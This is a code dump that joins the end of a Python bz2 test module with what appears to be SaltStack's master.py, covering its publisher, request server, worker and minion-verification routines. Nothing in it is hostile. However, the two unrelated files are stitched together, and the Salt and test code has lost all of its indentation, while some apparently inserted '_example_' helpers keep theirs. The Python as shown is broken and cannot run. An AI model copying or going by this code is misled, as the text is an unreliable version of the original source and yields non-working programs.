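# modes wrap the compressed binary stream in an io.TextIOWrapper, so encoding,
# errors and newline work as they do for the builtin open(). Hypothetical
# helper, never called by the tests.
def _example_open_text_roundtrip(path):
    """Write and re-read some UTF-8 text through bz2.open() at `path`."""
    import bz2
    with bz2.open(path, "wt", encoding="utf-8") as f:
        f.write("h\u00e9llo\nworld\n")
    with bz2.open(path, "rt", encoding="utf-8") as f:
        return f.read()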
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import signal
import shutil
import logging
import hashlib
import resource
import multiprocessing
import sys
# Import third party libs
import zmq
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.exitcodes
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.key
import salt.fileserver
import salt.loader
import salt.utils.schedule
import salt.daemons.masterapi
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
from salt.exceptions import MasterExit
from salt.utils.event import tagify
import binascii
# Import halite libs
try:
import halite
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
try:
import systemd.daemon
HAS_PYTHON_SYSTEMD = True
except ImportError:
HAS_PYTHON_SYSTEMD = False
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
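def _example_clean_proc_usage():
    '''
    Hypothetical usage sketch (not part of Salt): start a throwaway worker and
    shut it down with clean_proc(), which escalates from terminate() to
    SIGKILL if the child lingers for roughly wait_for_kill * 0.1 seconds.
    '''
    proc = multiprocessing.Process(target=time.sleep, args=(60,))
    proc.start()
    clean_proc(proc, wait_for_kill=10)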
class SMaster(object):
'''
Create a simple salt-master, this will generate the top level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
that clients are required to run as root in order to read it.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
# Warn if ZMQ < 3.2
if not(hasattr(zmq, 'zmq_version_info')) or \
zmq.zmq_version_info() < (3, 2):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
The clean old jobs function is the general passive maintenance process
controller for the Salt master. This is where any data that needs to
be periodically cleaned up or refreshed by the master is handled.
'''
# Set up search object
search = salt.search.Search(self.opts)
# Make Start Times
last = int(time.time())
rotate = int(time.time())
# Init fileserver manager
fileserver = salt.fileserver.Fileserver(self.opts)
# Load Runners
runners = salt.loader.runner(self.opts)
# Load Returners
returners = salt.loader.returners(self.opts, {})
# Init Scheduler
schedule = salt.utils.schedule.Schedule(self.opts, runners, returners=returners)
ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Init any values needed by the git ext pillar
pillargitfs = salt.daemons.masterapi.init_git_pillar(self.opts)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
old_present = set()
while True:
now = int(time.time())
loop_interval = int(self.opts['loop_interval'])
if (now - last) >= loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
if self.opts.get('publish_session'):
if now - rotate >= self.opts['publish_session']:
salt.crypt.dropfile(
self.opts['cachedir'],
self.opts['user'])
rotate = now
if self.opts.get('search'):
if now - last >= self.opts['search_index_interval']:
search.index()
salt.daemons.masterapi.fileserver_update(fileserver)
# check how close to FD limits you are
salt.utils.verify.check_max_open_files(self.opts)
try:
for pillargit in pillargitfs:
pillargit.update()
except Exception as exc:
log.error('Exception {0} occurred in file server update '
'for git_pillar module.'.format(exc))
try:
schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if schedule.loop_interval < loop_interval:
loop_interval = schedule.loop_interval
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
last = now
if self.opts.get('presence_events', False):
present = ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
event.fire_event(data, tagify('present', 'presence'))
old_present = present
try:
time.sleep(loop_interval)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check to see what our max open files (ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... OSX reports RLIM_INFINITY as
# hard limit, but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under OSX reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to {0}. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.'.format(
mof_c
)
)
def _pre_flight(self):
'''
Run pre flight checks, if anything in this method fails then the master
should not start up
'''
errors = []
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
if errors:
for error in errors:
log.error(error)
log.error('Master failed pre flight checks, exiting\n')
sys.exit(salt.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info(
'salt-master is starting as user {0!r}'.format(salt.utils.get_user())
)
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
reqserv.start_halite()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(
'Caught signal {0}, stopping the Salt Master'.format(
signum
)
)
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
if hasattr(reqserv, 'halite'):
clean_proc(reqserv.halite)
if hasattr(reqserv, 'reactor'):
clean_proc(reqserv.reactor)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Halite(multiprocessing.Process):
'''
Manage the Halite server
'''
def __init__(self, hopts):
super(Halite, self).__init__()
self.hopts = hopts
def run(self):
'''
Fire up halite!
'''
salt.utils.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise it's a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
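def _example_pub_pull_forwarder(pull_uri='ipc:///tmp/example_pull.ipc',
                                pub_uri='tcp://127.0.0.1:5556'):
    '''
    Hypothetical sketch of the forwarding pattern Publisher.run() implements
    above (these URIs are made up): anything pushed into the bound PULL socket
    is re-sent on the bound PUB socket for subscribers to pick up. This is a
    generic pyzmq illustration, not Salt's payload format.
    '''
    context = zmq.Context(1)
    pub_sock = context.socket(zmq.PUB)
    pub_sock.bind(pub_uri)
    pull_sock = context.socket(zmq.PULL)
    pull_sock.bind(pull_uri)
    try:
        while True:
            pub_sock.send(pull_sock.recv())
    finally:
        pub_sock.close()
        pull_sock.close()
        context.term()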
class ReqServer(object):
'''
Starts up the master request server; minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
os.remove(dfn)
except os.error:
pass
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle,
)
)
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
try:
if HAS_PYTHON_SYSTEMD and systemd.daemon.booted():
systemd.daemon.notify('READY=1')
except SystemError:
# Daemon wasn't started by systemd
pass
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt event publisher interface
'''
# Start the event publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def start_halite(self):
'''
If halite is configured and installed, fire it up!
'''
if HAS_HALITE and 'halite' in self.opts:
log.info('Halite: Starting up ...')
self.halite = Halite(self.opts['halite'])
self.halite.start()
elif 'halite' in self.opts:
log.info('Halite: Not configured, skipping.')
else:
log.debug('Halite: Unavailable.')
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
if self.clients.closed is False:
self.clients.setsockopt(zmq.LINGER, 1)
self.clients.close()
if self.workers.closed is False:
self.workers.setsockopt(zmq.LINGER, 1)
self.workers.close()
if self.context.closed is False:
self.context.term()
# Also stop the workers
for worker in self.work_procs:
if worker.is_alive() is True:
worker.terminate()
def __del__(self):
self.destroy()
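def _example_router_dealer_queue(front_uri='tcp://127.0.0.1:5557',
                                 back_uri='ipc:///tmp/example_workers.ipc'):
    '''
    Hypothetical sketch of the broker pattern ReqServer.__bind() sets up above
    (these URIs are made up): REQ clients talk to the bound ROUTER socket,
    replies come from REP workers connected to the bound DEALER socket, and
    zmq.device() shuttles messages between the two until the context dies.
    '''
    context = zmq.Context(1)
    clients = context.socket(zmq.ROUTER)
    clients.bind(front_uri)
    workers = context.socket(zmq.DEALER)
    workers.bind(back_uri)
    try:
        zmq.device(zmq.QUEUE, clients, workers)
    finally:
        clients.close()
        workers.close()
        context.term()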
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
self.k_mtime = 0
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# don't catch keyboard interrupts, just re-raise them
except KeyboardInterrupt:
raise
# catch all other exceptions, so we don't go defunct
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
continue
log.critical('Unexpected Error in Mworker',
exc_info=True)
# let's just redo the socket (since we won't know what state it's in).
# This protects against a single minion doing a send but not
# recv and thereby causing an MWorker process to go defunct
del socket
socket = context.socket(zmq.REP)
socket.connect(w_uri)
# Changes here create a zeromq condition, check with thatch45 before
# making any zeromq changes
except KeyboardInterrupt:
socket.close()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
if load['cmd'].startswith('__'):
return False
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
if load['cmd'].startswith('__'):
return False
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an AES key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
if data['cmd'].startswith('__'):
return False
return self.aes_funcs.run_func(data['cmd'], data)
def _update_aes(self):
'''
Check to see if a fresh AES key is available and update the components
of the worker
'''
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
except os.error:
return
if stats.st_mode != 0100400:
# Invalid dfn, return
return
if stats.st_mtime > self.k_mtime:
# new key, refresh crypticle
with salt.utils.fopen(dfn) as fp_:
aes = fp_.read()
if len(aes) != 76:
return
self.crypticle = salt.crypt.Crypticle(self.opts, aes)
self.clear_funcs.crypticle = self.crypticle
self.clear_funcs.opts['aes'] = aes
self.aes_funcs.crypticle = self.crypticle
self.aes_funcs.opts['aes'] = aes
self.k_mtime = stats.st_mtime
def run(self):
'''
Start a Master Worker
'''
salt.utils.appendproctitle(self.__class__.__name__)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = fs_.serve_file
self._file_hash = fs_.file_hash
self._file_list = fs_.file_list
self._file_list_emptydirs = fs_.file_list_emptydirs
self._dir_list = fs_.dir_list
self._symlink_list = fs_.symlink_list
self._file_envs = fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as err:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, err))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError as err:
log.error('Unable to decrypt token: {0}'.format(err))
log.error('Salt minion claiming to be {0} has attempted to'
' communicate with the master and could not be verified'
.format(id_))
return False
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorizes a minion to execute
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
(
'Minion id {0} is not who it says it is and is attempting '
'to issue a peer command'
).format(clear_load['id'])
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
verify_keys: A list of strings that should be present in a
given load.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from {0} for {1!r}, missing {2!r}'
.format(
load['id'],
inspect_stack()['co_name'],
'tok'
))
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
'Minion id {0} is not who it says it is!'.format(
load['id']
)
)
return False
if 'tok' in load:
load.pop('tok')
return load
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._ext_nodes(load, skip_verify=True)
def _master_opts(self, load):
'''
Return the master options to the minion
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Return the mine data
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master; files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not self.opts['file_recv'] or os.path.isabs(load['path']):
return False
if os.path.isabs(load['path']) or '../' in load['path']:
# Can overwrite master files!!
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
file_recv_max_size = 1024*1024 * self.opts.get('file_recv_max_size', 100)
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > file_recv_max_size:
log.error(
'Exceeding file_recv_max_size limit: {0}'.format(
file_recv_max_size
)
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from {0} for {1!r}, missing {2!r}'
.format(
load['id'],
inspect_stack()['co_name'],
'tok'
))
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
'Minion id {0} is not who it says it is!'.format(
load['id']
)
)
return {}
load.pop('tok')
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
load['path'])
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(load['data'])
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
mods = set()
for func in self.mminion.functions.values():
mods.add(func.__module__)
for mod in mods:
sys.modules[mod].__grains__ = load['grains']
pillar_dirs = {}
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
load.get('ext'),
self.mminion.functions)
data = pillar.compile_pillar(pillar_dirs=pillar_dirs)
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+b') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
for mod in mods:
sys.modules[mod].__grains__ = self.opts['grains']
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
self.masterapi._minion_event(load)
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if any(key not in load for key in ('return', 'jid', 'id')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['arg'] = load.get('arg', load.get('fun_args', []))
load['tgt_type'] = 'glob'
load['tgt'] = load['id']
prep_fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
load['jid'] = self.mminion.returners[prep_fstr](nocache=load.get('nocache', False))
# save the load, since we don't have it
saveload_fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[saveload_fstr](load['jid'], load)
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid']) # old dup event
self.event.fire_event(
load, tagify([load['jid'], 'ret', load['id']], 'job'))
self.event.fire_ret_load(load)
# if you have a job_cache, or an ext_job_cache, don't write to the regular master cache
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
# otherwise, write to the master cache
fstr = '{0}.returner'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
return None
# if we have a load, save it
if 'load' in load:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load)
# Format individual return loads
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid; only allowed
if the requesting minion also initiated the execution.
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, str(load['jid']))
with salt.utils.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion. This method enforces minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion. This method enforces minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load, skip_verify=True)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
try:
start = time.time()
